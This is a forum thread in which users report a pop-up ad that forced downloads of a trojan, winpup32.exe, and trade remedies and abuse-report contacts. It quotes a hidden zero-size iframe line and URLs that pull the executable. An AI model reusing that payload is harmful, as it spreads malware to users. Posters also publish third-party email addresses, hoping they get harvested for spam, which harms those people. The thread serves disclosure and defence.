The advertisement in question is: http:// media.popuptraffic.com/scripts/popup.php?hid=15a06373d81c1924f3f3&tmpl=8mp3pop.tmpl

This loads a frameset; one of which is http:// www. undergroundlair.net/install.php which forces a download from http:// www. smokeandapancake/winpup32.exe. Others have noted that this program serves a VB script code which links to a pornographic site.

I have seen it a number of times while browsing Xanga (presumably one of the sites you serve advertising on), and the FreeMP3Blaster.com must have been the rudest and most forceful form of advertising I have ever seen.  I believe the advertisement in question breaks your terms and conditions (http:// stats. popuptraffic.com/terms.html) and should be removed immediately.

Please remove the offending advertisement (and advertiser) from your service, check other advertisements on your service; and include code to ensure such things do not happen in future.

********

A solution to prevent the hundreds of download windows/machine gun page problem seems to be to add *.popuptraffic.com to the Restricted Sites list on Internet Explorer, which means anything from popuptraffic.com is not allowed to run scripts.  However, it is by NO means a perfect solution -- the culprit responsible may have put his winpup32/FreeMP3Blaster advert with ANOTHER advertiser.  Perhaps, the only real solution from the 'machine gun page' is to use another browser?
You're welcome.

>>I suppose the dialer won't work for people connected by broadband?<<
Only if they have a modem and telephone line connected.

>>forcing a download of some kind of trojan or spyware called winpup32.exe<<
You don't want to give it a name or function if you don't know what it is. I would
just say it's "a forced *.exe download that contains pornographic links within its code"
or something along those lines only.

popuptraffic.com email contact = domains@standardinternet.com
hosted on machines belonging to = DATAPIPE.NET   hostmaster@datapipe.net

undergroundlair.net domains@invinc.com (fake info)
also hosted on machines belonging to = DATAPIPE.NET   hostmaster@datapipe.net

freemp3blaster(d.o.t.)com = targetcommunicators(a.t.)yahoo.com

martylikes*******.com
jason@whitelid.com domain owner
name server = BROKECOLLEGE******.COM

So out of those I would contact datapipe.net (where the site is hosted) since the domain
registration information is fake on undergroundlair.net you'd probably be emailing to deaf
ears there. freemp3blaster I would throw one off to but since it's a yahoo email addy well...

The martylikes*******.com and the domain name server both belong to the same guy,
but he may be a sponsor and this popup forced download will definitely be against the
client agreement policy.

Also I have no reservations about posting these email addresses here at EE. Webmasters
know that they will be harvested a thousand times. So these people will get some spam
because their email addresses lay here...it's a small consolation. I saved freemp3blaster(d.o.t.)com
from this because they may be innocent of all this.

I run by the belief that if you surf porn then you better expect some flak but webmasters who
use non-adult sites to promote porn have crossed the line of decency and they deserve to be
taken out at the knees.
Thanks!

>> I run by the belief that if you surf porn then you better expect some flak

I totally agree.  But for the record, I have not been surfing anything 'bad'!

I've emailed Xanga about this -- asking whether they are indeed using popuptraffic.com as one of their advertisers; and if they are, to get popuptraffic to remove the offending ad.  This is the reply I got:

"Xanga DOES NOT SERVE POP UPS. But other third party providers will such as Flooble Chatterbox. So if you feature them or have that on your Xanga site or some other third party feature then this can happen.

Typically what happens is that some other company is getting their ad put up thrue [sic] them.

I hope this helps. Thanks for the e-mail."

As they were saying, it might be third-party providers.  Or perhaps, (and I am purely speculating here) since Xanga is an online community, there's a possibility that some user linked to some other site for their images or iframes or whatever; and thus, the porn-related advertisements appear.  However, if that is the case, then some Xanga user has broken the Xanga terms and conditions (except it's hard to pinpoint since the ads seem random).

------

Also, notice that the advertisement pretends to be mp3.com (it copies the site design) -- when in fact it links to freemp3blaster.com.  MP3.com is definitely unrelated -- so perhaps this is something mp3.com ought to be looking in to -- if they care about their brand name.


------

Datapipe.net
I got an automated reply from Datapipe:

"The information that you have provided will be used to investigate the incident for violations of our Acceptable Use Policy at:
http://www.datapipe.com/Acceptable_Use_Policy.asp
Once the investigation is complete, action in accordance with our policies will be taken against the offending account immediately.  
Since the current volume of email prohibits a personal reply to all reports, unless additional information is required, this may be the only response you will receive.
DataPipe maintains a "zero tolerance" policy towards spam and network abuse at any time."
brakk0:  thanks - yes, adding media.popuptraffic.com to hosts file seems to do the trick!
i'll be keeping track of that thread as well.

update-

it seems like the ad no longer pops up from the media.popuptraffic. com site noted above.  so that's a step forward!  however, the sites in question still exist.

http:// www. undergroundlair.net / install.php   still exists and now points to:
<iframe src="http:// www. smokeandapancake.org/ shizzy/pwf/winpup32. exe" width="0" height="0">

so, datapipe.net hasn't removed the culprit's sites in question yet

(note:  spaces added in the URL to prevent them from turning into live links)

-------------

I also contacted mp3.com (because the ad in question copied their site design and basically infringes their trademarks) but they either don't care or completely missed the point:

"We are sorry that you were not satisfied with our service
and appreciate you taking the time to give us this feedback concerning your experience with MP3.com.  We will use your feedback to continue to improve the level of service we provide our customers. "
My Norton AV reported hundreds of Winpup32.exe as Trojan Horse or Backdoor.Trojan. Are you sure it just starts download sessions?
One morning I woke up
Download Winpup32 from Smokeandapancake?
I said OK

Norton antivirus said, Virus time(TROJAN)
Norton antivirus didn't fix it

I found this site.

I downloaded spyware since my norton didn't fix it
I ran spyware.
I saw all files with a virus
I went to C/programfiles/commonfiles/gmt/banners

I deleted everything in the folder in the afternoon

I rebooted

I ran norton virus scan. No more virus.

My theory. Someone wrote a program to stop popups. They named it winpup32. It went berserk like Frankenstein. I guess they got the name Smokeandapancake from the movie Goldmember.

That's all I have
gibilix:  no, the program COMES from a particularly forceful advertisement which forces download sessions on users using an iframe exploit in Internet Explorer.  however, yes, you are right, it IS a trojan horse/backdoor --- I'm glad to hear that Norton AntiVirus now reports it as a trojan.

defini:  read spiderfix's responses above - winpup32 seems to be porn-related.